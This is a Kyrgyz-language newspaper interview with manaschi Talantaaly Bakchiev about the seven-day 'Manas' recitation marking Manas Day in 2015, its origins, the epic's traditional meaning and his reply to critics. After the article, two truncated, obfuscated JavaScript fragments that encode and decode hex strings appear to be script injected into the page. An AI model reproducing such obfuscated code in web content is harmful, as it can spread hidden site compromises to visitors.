Талантаалы БАКЧИЕВ, манасчы: “Манасты” – билим, күч-кубат, дем-кайрат алуу максатында угушкан”

Манас – чексиз ойдун ченемсиз күчү

Ордо калаабыздагы “Дасмия” этнокомплексинде 7 күн, 7 түн “Манас” үчилтигин айтуу иш-чарасы 27-ноябрда саат 14.30да салтанаттуу башталып, 4-декабрда саат 14.30да салтанаттуу аяктады.

Иш-чаранын жабылышында “Саякбай манасчы” Эл аралык коомдук фондусу иш-чарага катышкан манасчынын ар бирине 15 миң сомдон акчалай сыйлык жана компьютер тапшырды. 

12349609_943475835726821_964695196_o

4-декабрда, КРнын Өкмөт Башчысы Темир Сариевдин  катышуусу менен саат 10.00дө Бишкектеги “Манас айылы” этнокомплексинде Саякбай Каралаевдин айкелинин ачылышы, ошол эле күнү саат 11.00дө А.Малдыбаев атындагы Опера жана балет театрында салтанаттуу жыйын өткөрүлдү. Бул салтанаттуу жыйында манасчылар: Талантаалы Бакчиевди, Рысбай Исаковду, Улан Исмаиловду КРнын Өкмөтүнүн аталышы жазылган атайын алтын саат менен Темир Сариев сыйлады.

“Манаска” байланышкан иш-чаралардын жүрүшүн Кыргызстандагы ММКнын дээрлик бардыгы чагылдырып жатышты. Ал эми жети күндүктүн кандай өткөнү жана бул иш-чаранын негизи тууралуу маалымат алууну көздөп, манасчы, Манастаануучулардын эл аралык ассоциациясынын Президенти, филология илимдеринин кандидаты, доцент Талантаалы Бакчиевди маекке тарттык.

4-Талантаалы Бакчиев– Жети күндүк, жети түндүк иш-чара сиздин оюңузча өз максатына жеттиби?

–  “Манас” айтуу иш-чарасынын бул жылкы максаты катары, “Манас” Күнүн белгилөө эсептелинген. Кыргыз элинин жана Кыргызстандын тарыхында биринчи жолу расмий түрдө, көптөн күткөн Кыргыз Республикасынын Өкмөтүнүн 2015-жылдын 12-апрелиндеги Токтому менен 4-декабрь күнү мындан ары “Манас” Күнү деп бекитилген эле. Ошол себептүү, азыркы манасчылар өздөрүнүн негизги милдети катары айтуучулуктун салттуу жолу менен аталган майрам Күнүн татыктуу деңгээлде белгилөө максатында, өз озуйпасын аткарышты, алар: Назаркул Сейдрахманов, Салимбай Турсунбаев, Талантаалы Бакчиев, Рысбай Исаков, Замирбек Баялиев, Дөөлөтбек Сыдыков, Камил Мамадалиев, Самат Көчөрбаев, Улан Исмаилов, жаш манасчылар Нурбек, Азиз, Гүлжигит, Үмөт жана башкалар.

Экинчи жолу өткөрүлүп жаткан бул иш-чарада манасчылар үчилтиктин “Семетей” бөлүгүнөн баштап, “Сейтекти” айтып, “Манастын” “Чоң казат” окуясына чейин айтып жетишишти. “Манас” угууга  КРнын Жогорку Кеңешинин, Бишкек шаардык Кеңешинин депутаттары, Маданият, маалымат жана туризм Министри, анын орун басары, катардагы шаар тургундары, мекеме-уюмдары, жогорку окуу-жайларынын окутуучулары менен студенттери, орто окуу жайларынын мугалимдери менен окуучулары эле эмес, Чүйдүн айылдарынан да карапайым эл из суудурбай келип жатты.

4-жаңы эстелик

– Мындай иш-чараны өткөрүү демилгесин алгач сизди көтөрүп чыккан дешет?

– Былтыр, 2014-жылы Саякбай Каралаевдин 120 жылдыгына карата  7 күн, 7 түн Манас айтуу иш-чарасын өткөрүү демилгесин ошол кезде мен жетектеген “Саякбай манасчы” коомдук фондунун мүчөсү Нургазы Бакалов экөөбүз көтөрүп чыгып, фонддун  негиздөөчүлөрүнө жана жалпы жамаатына сунушталган. Алар демилгени дароо кубаттап, колдоп беришкен. Ошентип, бул руханий иш-чараны өткөрүү милдетин биздин фонд өз мойнуна алып, 26-октябрда Кочкор районунун Ак-Өлөң айылында өткөрүлө турган манасчынын 120 жылдык тоюнун алдында 18-25-октябрь күндөрүнө белгилеген. Аталган иш-чараны өткөрүү үчүн Саякбай манасчынын алгач ирет аян алган жери – Ак-Өлөң айылынын батыш тарабындагы Көңдөй деген өрөөн тандалып алынган эле. Иш-чаранын негизги максаты болуп, “ХХ кылымдын Гомери” атыккан Саякбай Каралаевдин жаркын элесин эскерип, азыркы айтуучулардын салттуу жол менен алп манасчынын арбагы алдынан өтүү милдети катары каралган. Ошондо жети боз үй тигилип, жети манасчы тарабынан жети күнү, жети түнү “Манас” айтылган.

– Эмне үчүн “жети” деген санды негиз туттуңуздар?

– Саякбай Каралаевдин өмүр-баянын иликтеп жатып, анын өмүрүндө “жети” деген сан өтө эле көп кездешкендигин даана байкагам: 7 май (каза болгон күнү), 1971-жыл (каза болгон жылы), 77 жаш (77 жаш курагында каза болгон).  Ошол себептен “жети” деген санды ыйык тутуп, фонддун жамаатына жана манасчыларга дагы бир жолу кайрылган элем. Бул сунушумду да фонддун өкүлдөрү колдоп беришкен.

Албетте, азыркы Кыргызстандын тарыхында мындай руханий маанидеги иш-чара мурда-кийин болбогондуктан, аны уюштуруу жана тийиштүү деңгээлде өткөрүү биздин фонд үчүн ары түйшүктүү да, ары кыйын да болду .Ошондо кандаш агам Малик Арыкбаевдин, санаалаш агам Нургазы Бакаловдун, ак-жүрөк окуучум, иним Дамир Кыдыровдун моралдык колдоосу мага дем болуп турду.  Фонддун өкүлдөрү: Болот Берикбаев, Нурбек Айбашев, Нурлан Чолоев, Нурлан Молдошев, Кубан Абылов ж.б. агаларым иш-чаранын каржы маселесин толугу менен өз моюндарына алышкан.

“Манас” айтыла турган Көңдөй деген жерге белги таш орнотулуп, “Саякбай манасчы” коомдук фондунун желеги менен туусу сайылып, 18-октябрда кечки саат жетиде “Манас” айтуу иш-чарасы башталган. “Манас” айтуу үчүн Кыргызстандын туш-тарабында жашаган манасчылардын бардыгы чакырылган эле. Бирок, кызык нерсеси, ошондо да иш-чарага катышууга 7 гана манасчы макулдугун берип, баатырдын баянын айтышкан, алар: Зууракан Сыдыкова, Тилек Асанов, Замирбек Баялиев, Дөөлөтбек Сыдыков, Улан Исмаилов, Өмүрбек Токтогулов жана мен.

– Башка аймактан Кочкор районуна чейин Манас угууга баргандар болдубу?

– Элден айланса болот, “Манас” айтылып жаткан күндөрү Кыргызстандын туш тарабынан эл агылып жатты. “Манас” угуу үчүн ар жагы Ат-Башы менен Түптөн, бери жагы Талас менен Чүйдөн эл тынбай келди. Айрымдары конуп-түнөп жети күн өткүчө биз менен бирге болуп, “Манас” тыңдап жатышты. Көрсө, элибиз көптөн бери жакындан “Манас” укпай суусап, жакындан манасчыны көрбөй сагынып калган экен. Ошондо манасчыларыбыз эл үчүн жаралган “Манасты”, кайрадан элге тартуулап айтып жатты. “Эрдин куну элде жүрсүн, эриккенде колго тийсин”  деген макал ошондо бап келди. Элден айланса болот, Тоңдун Кара-Шаар, Ак-Өлөң, Оттук, Таш-Короо, Көк-Мойнок айылдарынан, Балыкчы шаарынан келген кары-жаш боз үйүн тигип, казан-аягын алып келип, күнү-түнү тынбай айтып жаткан манасчыларга тамак-ашын белендеп берип турду. “Манастын” алдында баары бирдей эмеспи, карапайым эл менен бирге бийлик өкүлдөрү, саясатчылар да келип, бир нече сааттап “Манас” угуп кетүүгө үлгүрүшкөн.

4-Т Сариев

– Манас дүйнөсү тууралуу канча айтылып, канча жазылбасын, аны кыргыздын касиети катары кабылдаганга дарамети жетпей жаткандар жетишерлик. Манасчы  катары Манас дүйнөсүнөн кыскача сөз салып берсеңиз?

– “Манас” айтуу процесси илгертен бери кыргыз элинин жашоо-турмушун коштоп келген салттуу руханий көрүнүш. Орус фольклористи Б.Н.Путилов  “Манас” тууралуу мындай деп айткан: “Манас” сыяктуу руханий зор мурастагы касиеттүү сырды түшүндүрүү мүмкүн эмес. Анын сыры табышмак бойдон кала берет. Ал касиеттин кайдан келип, кантип адамга берилээрин түшүндүрүүгө азырынча эч кимдин акылы жетпейт”.

Ал эми казак-орус окумуштуусу Ч.Валихановдун, немец-орус окумуштуусу В.Радловдун, кыргыз элинин тарыхчысы Б.Солтоноевдин жана башкалардын жазып кеткен материалдарына жана элдин эс тутумунда сакталып калган маалыматтарга караганда, “Манас” кыргыз элинин жакшылыгында да, жаманчылыгында да айтылып келген баян.

Айтсак: тушоо кесүү, үйлөнүү тоюнда, жоокерлер согушка аттанаарда, сөөк узатаарда, чоң ашта, курултайларда, кадырлуу конок тосуу салтанаттарында, мүңкүрөп кайгы-капа тарткан мезгилдерде, ар кандай ооруга чалдыккан учурларда ж.б. элдик турмуш жагдайларында жана шарттарында “Манас” айтылчу. Демек, ушундан улам, “Манастын” өзүн жана андагы ар бир окуяны өзгөчө биоэнергетикалык жүк артып жүргөн баян катары түшүнүүгө болот. Муну биз: Балыкооздун, Назардын, Сагымбайдын, Чоюкенин, Мамбетаалынын, Саякбайдын, Шаабайдын жана башка бир катар белгилүү манасчы-жомокчулардын айтуучулук тажрыйбаларынан, өмүр баяндарынан көрө алабыз. Кыргыздар “Манасты” көңүл ачуу үчүн эмес, маалымат, билим, күч-кубат, дем, кайрат алуу максатында айттырышкан. Ошол максатта угушкан.

Кийинки жылдары, кыргыз эли “Манасты” күндөп-түндөп, сааттап угууну мындай кой, концерттик программанын же кароо-сынактын алкагында он мүнөттөн ашык уга албай калган. Айрым бир тар чөйрөдө же теле-радио аркылуу эле болбосо, манасчынын жалпы элге сааттап, күндөп-түндөп жандуу жана салттуу түрдө, эл алдында “Манас” айтуу процесси сейрек көрүнүш болуп бара жаткан. Албетте, анын объективдүү да, субъективдүү да себептери болгон. Андай абалдын жаралышына манасчылардын өздөрү да ыкшоолонуп, шарт түзүп берип койгон. Ошентип, бара-бара манасчы өз элинен алыстап, өгөй баладай, кереги жоктой болуп калган. А түгүл айрымдар аны архаикалык көрүнүш, эскинин калдыгы катары кабылдап калышкан. Ошондон улам, кылымдар бою “Манас” угуп, “Манас” менен жашап келген кыргыз эли, “Манас” дүйнөсүнөн алыстап, аны “эпос”, же “миф” деген Батыштын дүйнөтаанымы менен жана социалисттик идеологиянын атеисттик илимий көз карашы менен “оозеки көркөм чыгарма” гана катары кабылдап калган.

“Манаска” болгон эл ичинде уюп калган мындай мамиле, алп манасчы Саякбай Каралаевдин 120 жылдыгына арналган (1894-1971) 7 күн, 7 түн тынбай “Манас” айтуу иш-чарасын өткөрүүгө да себепкер болду.

– Экинчи жолку өткөн “жети күндүккө” сырттан сын айткандар интернет булактарында пайда болушууда, буларга манасчылар жана иш-чаранын уюштуруучулары кандай карап жатышат?

– Албетте, “Манас” айтуу иш-чарасынын жүрүшүндө эл тарабынан ар тараптуу ой-пикирлер айтылып жатты. Айрымдар муну шоу катары көрүшсө, айрымдар кыргыз элинин салттуу ырым-жырымы катары кабылдашты. Дагы кээ бирөөлөр иш-чарага катышкан манасчыларыбызды “манасчыбайлар”, “шизиктер”, “обу жоктор” деп, душман айтпаган кер какшык сөздөр менен аташты.

Учурдан пайдаланып айта кете турган сөз, ичи тардык, көрө албастык көрүнүштөрү бул иш-чарада да чыйкандай болуп кара-көк тартып көрүнүп жатты. Албетте, эл ичиндеги мындай мүнөздөгү ой-пикирлерди “эл оозунда элек жок” деген макал менен эле чектеп койсок болор эле. Бирок мунун төркүнү башкада болуп жатпайбы. Совет доорунун 1930-1950-жылдары төбөсү көрүнгөн, башкалардан озунуп алдыга умтулган, “жолун тороп, ыңгайсыз” деп эсептелинген кыргыз эр азаматтарын, кыргыздан чыккан ичи тар, көрө албас айрым көөдөнү сокурлар “эл душманы” деген жалган жалаа менен жеп-жутуп, өздөрүнүн кызмат ордун, жанын сактап калышкан. Андай коркунучка учурунда, ошондой эле ыкма менен атасы курмандыкка чалынган, Чыңгыз Айтматов да дуушар болгон. Эгерде ал учурунда, Москвага анан андан ары Европага кетип калбаганда, Айтматов Айтматов болот беле, же анын да түбүнө жетишет беле, ким билет? Азыр да дал ошондой сценарий менен айрым манасчыларга жана манастаануучуларга “калмак”, “жайсаңчыл” деген атама менен ат коюп, “Манасты” жамынып өз даңгыр жолун тазалап жатышканы белгилүү. Бул ыкма коркоктуктун жана ичи тардыктын, көрө албастыктын аракети экендиги да белгилүү.

4-сыйлык

Душман жокто душман издеп, ичинен өзүн-өзү жеп-жонуп жаткан мындай курал элдин келечегине да доо кетириши мүмкүн. Дал ушундай ыкма менен учурунда кыргыздан чыккан ийри жыландар К.Тыныстановду, Т.Айтматовду, Ж.Абдрахмановду, Т.Байжиевди ж.б. жок кылышкан. Ал кезде Ж.Самагановдун, Г.Самариндин, Г.Нуровдун, П.Балтиндин, К.Бакеевдин, Ж.Бердибековдун Т.Саманчинге, Т.Байжиевге, З.Бектеновго, Ж.Шүкүровго, Х.Карасаевге, К.Юдахинге каршы жүргүзгөн чабуулу туура кадам катары кабылданып, ошол кездеги мамлекеттик идеология тарабынан колдоо тапкан. Андай саясый кампания социалисттик саясый идеология үчүн жана “боло албай жаткан” айрым жеке адамдар үчүн  өтө зарыл эле. Ал эми бүгүнкү күндө болсо, мындай мыкты сценарийлештирилген программа айрым гана жеке адамдар үчүн зарыл болуп турат.

Кымбат ЖОЛДОШЕВА

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return “kok-asaba.journalist.kg”},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(“http”)==0){return p}for(var e=0;e

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "kok-asaba.journalist.kg"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Комментарий кошуу

Сиздин электрондук почтаңыз жарыяланбайт. Милдеттүү талаалар белгиленген *